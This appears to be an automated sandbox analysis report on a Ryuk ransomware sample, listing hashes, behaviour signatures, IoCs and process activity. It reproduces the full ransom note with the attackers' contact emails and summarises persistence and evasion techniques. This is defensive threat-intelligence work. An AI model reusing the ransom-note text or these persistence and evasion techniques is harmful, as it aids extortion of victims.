ryuk | be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

Resubmissions

07-11-2022 11:53

221107-n2tpwsedf5 10

07-11-2022 11:00

221107-m36keacfd7 10

Analysis

max time kernel
179s
max time network
248s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2022 11:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
Size

885KB
MD5

622bc38dee08e70e91e2be32a58b6d1f
SHA1

7cfec4859fa7ca178095983b3f174f842a44b0c2
SHA256

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a
SHA512

176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d
SSDEEP

12288:BdJPiMwyM02Jl5YqWYgeWYg955/155/0QebUlAAszsK6Qo1Rn6X:BPiMtklagQKUKRzsK6QmN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at RyanRinse@mailfence.com or RyanRinse@firemail.de You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

RyanRinse@mailfence.com

RyanRinse@firemail.de

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Disables Task Manager via registry modification
evasion

Drops startup file 3 IoCs

Processes:

attrib.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

4720 icacls.exe

pid	process
4720	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

description	ioc	process
File opened (read-only)	\??\M:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\R:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\Z:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\O:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\P:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\Q:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\S:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\Y:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\E:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\I:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\B:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\K:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\L:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\N:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\A:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\X:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\G:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\H:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\J:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\V:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\W:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\F:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\T:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\U:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

Drops file in Program Files directory 64 IoCs

Processes:

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

description	ioc	process
File opened for modification	C:\Program Files\7-Zip\Lang\an.txt.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\cldrdata.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fur.txt.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\va.txt.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\SubsystemController.man.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\ApproveRegister.asx.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\tzdb.dat.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.zh_CN_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\th.txt.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\classlist.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\epl-v10.html.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\include\jni.h.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.net.nl_zh_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\vi.txt.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\trusted.libraries.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\config.ini.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_pl.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-text.xml.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\dnsns.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-core-kit.xml.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\RegisterWrite.dwg.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\7-Zip\7z.sfx.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar.[RyanRinse@mailfence.com].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2692 schtasks.exe
1352 schtasks.exe
1740 schtasks.exe
2432 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

2752 taskkill.exe
3380 taskkill.exe

pid	process
2692	schtasks.exe
1352	schtasks.exe
1740	schtasks.exe
2432	schtasks.exe

pid	process
2752	taskkill.exe
3380	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

pid	process
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

taskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 2752 taskkill.exe
Token: SeDebugPrivilege 3380 taskkill.exe

description	pid	process
Token: SeDebugPrivilege	2752	taskkill.exe
Token: SeDebugPrivilege	3380	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4116 wrote to memory of 4824	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 4824	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4824 wrote to memory of 1740	4824	cmd.exe	schtasks.exe
PID 4824 wrote to memory of 1740	4824	cmd.exe	schtasks.exe
PID 4116 wrote to memory of 4184	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 4184	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 3292	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 3292	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 4828	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 4828	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4828 wrote to memory of 2432	4828	cmd.exe	schtasks.exe
PID 4828 wrote to memory of 2432	4828	cmd.exe	schtasks.exe
PID 4116 wrote to memory of 1560	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 1560	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 1560 wrote to memory of 4944	1560	cmd.exe	attrib.exe
PID 1560 wrote to memory of 4944	1560	cmd.exe	attrib.exe
PID 4116 wrote to memory of 920	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 920	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 920 wrote to memory of 2692	920	cmd.exe	schtasks.exe
PID 920 wrote to memory of 2692	920	cmd.exe	schtasks.exe
PID 4116 wrote to memory of 4736	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
